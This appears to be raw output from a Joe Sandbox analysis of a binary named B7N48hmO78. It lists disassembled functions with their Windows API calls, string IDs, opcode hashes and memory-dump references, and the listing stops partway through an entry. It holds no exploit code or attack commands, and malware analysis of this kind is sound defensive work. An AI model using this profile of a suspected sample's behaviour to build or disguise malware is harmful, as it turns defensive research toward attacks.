                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?$|?
                                                                                                                  • API String ID: 2862541840-300242882
                                                                                                                  • Opcode ID: b4a5f503a6b5e1fbeee04ffafa9237d6b7030f63b4b9a6cf6d46a36c33d3d86e
                                                                                                                  • Instruction ID: 9bff055f00b7e605528e8740586de70cf42b4857ecc03dee755d047322412b38
                                                                                                                  • Opcode Fuzzy Hash: b4a5f503a6b5e1fbeee04ffafa9237d6b7030f63b4b9a6cf6d46a36c33d3d86e
                                                                                                                  • Instruction Fuzzy Hash: 21918171A00219ABDF24CFA5D848FEEBBB8EF85714F109559F616BB180DB709944CBA0
                                                                                                                  Function 00E3ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • CoInitialize.OLE32 ref: 00E3ADF6
                                                                                                                  • CoUninitialize.COMBASE ref: 00E3AE01
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,00E6D8FC,?), ref: 00E3AE61
                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 00E3AED4
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E3AF6E
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E3AFCF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                  • Opcode ID: 99b46169777ef41e3c7f069c87e80febe28174007a865b419ac0da694caca460
                                                                                                                  • Instruction ID: a02b47e50f49b36b0cf0423d31220b89870e78420f45ad4ac080c9a566bf35a0
                                                                                                                  • Opcode Fuzzy Hash: 99b46169777ef41e3c7f069c87e80febe28174007a865b419ac0da694caca460
                                                                                                                  • Instruction Fuzzy Hash: C5619B717083119FC710EF55D848BAABBE8EF49754F085429F985AB291C770ED88CBA3
                                                                                                                  Function 00E38107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00E38168
                                                                                                                  • inet_addr.WS2_32(?), ref: 00E381AD
                                                                                                                  • gethostbyname.WS2_32(?), ref: 00E381B9
                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00E381C7
                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E38237
                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E3824D
                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E382C2
                                                                                                                  • WSACleanup.WS2_32 ref: 00E382C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                  • String ID: Ping
                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                  • Opcode ID: 10c873917bcd34ed62969eed140886881242440213ccdb5e83f50761a610564f
                                                                                                                  • Instruction ID: b0e16bd859227887f6d6260228100ecb24659648f4180ff3dcd7c78496b59e81
                                                                                                                  • Opcode Fuzzy Hash: 10c873917bcd34ed62969eed140886881242440213ccdb5e83f50761a610564f
                                                                                                                  • Instruction Fuzzy Hash: 1A51C1316047009FDB20AF65DD49B6BBBE4EF48314F04982AFA55E72A1DF70E804CB52
                                                                                                                  Function 00E2E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2E396
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E2E40C
                                                                                                                  • GetLastError.KERNEL32 ref: 00E2E416
                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00E2E483
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: c1589613cc78fa22be8bcdf879190837810f9920ad730d445fbf19cc66ea34d7
                                                                                                                  • Instruction ID: c293c01aeb790ab5e03c13d87515617177caf4a5fc49e7c8fe684dd97771f39f
                                                                                                                  • Opcode Fuzzy Hash: c1589613cc78fa22be8bcdf879190837810f9920ad730d445fbf19cc66ea34d7
                                                                                                                  • Instruction Fuzzy Hash: 5A319235A002299FDB01FB64EC45EAEB7B4EF18348F149015E515FB391DB70AE02C761
                                                                                                                  Function 00E1B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E1B98C
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00E1B997
                                                                                                                  • GetParent.USER32 ref: 00E1B9B3
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E1B9B6
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00E1B9BF
                                                                                                                  • GetParent.USER32(?), ref: 00E1B9DB
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E1B9DE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                  • Opcode ID: 731077da2df37fc8eae44cecf1cfe05c22b74e1099acc286e710d5d1bedc7c36
                                                                                                                  • Instruction ID: da029c2c727d62db61bcda1deb673b57a2289d0741f873e1e0e996a8e937b63d
                                                                                                                  • Opcode Fuzzy Hash: 731077da2df37fc8eae44cecf1cfe05c22b74e1099acc286e710d5d1bedc7c36
                                                                                                                  • Instruction Fuzzy Hash: 7521F1B0A00104BFCF00ABA5DC82EFEBBB5EB49310B004119F651B72A1DBB4485A9B30
                                                                                                                  Function 00E1B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E1BA73
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00E1BA7E
                                                                                                                  • GetParent.USER32 ref: 00E1BA9A
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E1BA9D
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00E1BAA6
                                                                                                                  • GetParent.USER32(?), ref: 00E1BAC2
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E1BAC5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                  • Opcode ID: 582bc2edb9192cd01df39d1877dfe76caec4952a3bab1dc5dd31f395cdf14d40
                                                                                                                  • Instruction ID: 0d644e648312a80c2a87f4a3b162f56ab8ccbae6a7d341077623e19cdda7d067
                                                                                                                  • Opcode Fuzzy Hash: 582bc2edb9192cd01df39d1877dfe76caec4952a3bab1dc5dd31f395cdf14d40
                                                                                                                  • Instruction Fuzzy Hash: B921D0B4A00208BFDF01ABA5CC85EFEBBB9EF45300F401019F551B31A1DBB5585A9B30
                                                                                                                  Function 00E1BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32 ref: 00E1BAE3
                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00E1BAF8
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1BB0A
                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E1BB85
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                  • Opcode ID: 5f0d23b12e2edec4b75d642352258669af16ead1a27aba3a83379e0a13ca0b7a
                                                                                                                  • Instruction ID: 40214c966929f06e761f031a4137525fac776f11b611203c27cb2afb35362d62
                                                                                                                  • Opcode Fuzzy Hash: 5f0d23b12e2edec4b75d642352258669af16ead1a27aba3a83379e0a13ca0b7a
                                                                                                                  • Instruction Fuzzy Hash: 0E11E0B670C303FAFE247621EC06DEA379C9B12364F202026FA05F54E9EBE2A8D15514
                                                                                                                  Function 00E3B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E3B2D5
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E3B302
                                                                                                                  • CoUninitialize.COMBASE ref: 00E3B30C
                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00E3B40C
                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E3B539
                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00E3B56D
                                                                                                                  • CoGetObject.OLE32(?,00000000,00E6D91C,?), ref: 00E3B590
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00E3B5A3
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E3B623
                                                                                                                  • VariantClear.OLEAUT32(00E6D91C), ref: 00E3B633
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2395222682-0
                                                                                                                  • Opcode ID: 0c705497f41e1d3f86379c6cc36a2c1707d0f10277beee23b755938cbd45562d
                                                                                                                  • Instruction ID: 156bc7372d45d77fd7d696d98424c771c23aaa4adcf625cf07141388fa86969a
                                                                                                                  • Opcode Fuzzy Hash: 0c705497f41e1d3f86379c6cc36a2c1707d0f10277beee23b755938cbd45562d
                                                                                                                  • Instruction Fuzzy Hash: A8C12371608304AFC704DF65C88996BBBE9FF88348F00595DF68AAB251DB71ED05CB62
                                                                                                                  Function 00E0ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __lock.LIBCMT ref: 00E0ACC1
                                                                                                                    • Part of subcall function 00E07CF4: __mtinitlocknum.LIBCMT ref: 00E07D06
                                                                                                                    • Part of subcall function 00E07CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00E07D1F
                                                                                                                  • __calloc_crt.LIBCMT ref: 00E0ACD2
                                                                                                                    • Part of subcall function 00E06986: __calloc_impl.LIBCMT ref: 00E06995
                                                                                                                    • Part of subcall function 00E06986: Sleep.KERNEL32(00000000,000003BC,00DFF507,?,0000000E), ref: 00E069AC
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E0ACED
                                                                                                                  • GetStartupInfoW.KERNEL32(?,00E96E28,00000064,00E05E91,00E96C70,00000014), ref: 00E0AD46
                                                                                                                  • __calloc_crt.LIBCMT ref: 00E0AD91
                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00E0ADD8
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E0AE11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1426640281-0
                                                                                                                  • Opcode ID: 7300afc4fadae89005af5f18bdb52ffd8971e40f5bc8b196a11dc69775bccbaf
                                                                                                                  • Instruction ID: 3b2b776a32c6efa19f641f4629d56bc4c34ffd2521050863cf37f692476254bd
                                                                                                                  • Opcode Fuzzy Hash: 7300afc4fadae89005af5f18bdb52ffd8971e40f5bc8b196a11dc69775bccbaf
                                                                                                                  • Instruction Fuzzy Hash: 2B81E671A053498FDB14CF68C8405AEBBF0AF4A324B28526DD4A6BB3D1D7349887CB52
                                                                                                                  Function 00E24025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E24047
                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E2405B
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00E24062
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E230A5,?,00000001), ref: 00E24071
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E24083
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E230A5,?,00000001), ref: 00E2409C
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E230A5,?,00000001), ref: 00E240AE
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E240F3
                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E24108
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E24113
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2156557900-0
                                                                                                                  • Opcode ID: 50f8c06034481c7cf24f2f6dba895bf6f82f766bd57e78393f13394d67afeddc
                                                                                                                  • Instruction ID: 70a66ab1390bb775b6fca2a4ab9a4b2a87a57f0159bd0a46cbc9d72c3761b7a1
                                                                                                                  • Opcode Fuzzy Hash: 50f8c06034481c7cf24f2f6dba895bf6f82f766bd57e78393f13394d67afeddc
                                                                                                                  • Instruction Fuzzy Hash: B231E5F1A00220BFDB11CF66FC45F6AB7A9AB55365F148006F905F62D0C7B4AD888B61
                                                                                                                  Function 00DE3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DE30DC
                                                                                                                  • CoUninitialize.COMBASE ref: 00DE3181
                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00DE32A9
                                                                                                                  • DestroyWindow.USER32(?), ref: 00E55079
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00E550F8
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E55125
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                  • String ID: close all
                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                  • Opcode ID: 4a0e48016b7ca8ea50e01a3eee9dbe12f6f31ef3b3413b21beb404c1bfe92cb7
                                                                                                                  • Instruction ID: d1fc48398065fdd12a3ee74762841363aa40af432476960bd4308e83499fc94c
                                                                                                                  • Opcode Fuzzy Hash: 4a0e48016b7ca8ea50e01a3eee9dbe12f6f31ef3b3413b21beb404c1bfe92cb7
                                                                                                                  • Instruction Fuzzy Hash: 88914B31600682CFC715FF15C899B79F3A4FF04305F5491A9E50AA72A2DB30AE1ACF64
                                                                                                                  Function 00DFCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00DFCC15
                                                                                                                    • Part of subcall function 00DFCCCD: GetClientRect.USER32(?,?), ref: 00DFCCF6
                                                                                                                    • Part of subcall function 00DFCCCD: GetWindowRect.USER32(?,?), ref: 00DFCD37
                                                                                                                    • Part of subcall function 00DFCCCD: ScreenToClient.USER32(?,?), ref: 00DFCD5F
                                                                                                                  • GetDC.USER32 ref: 00E5D137
                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E5D14A
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E5D158
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E5D16D
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00E5D175
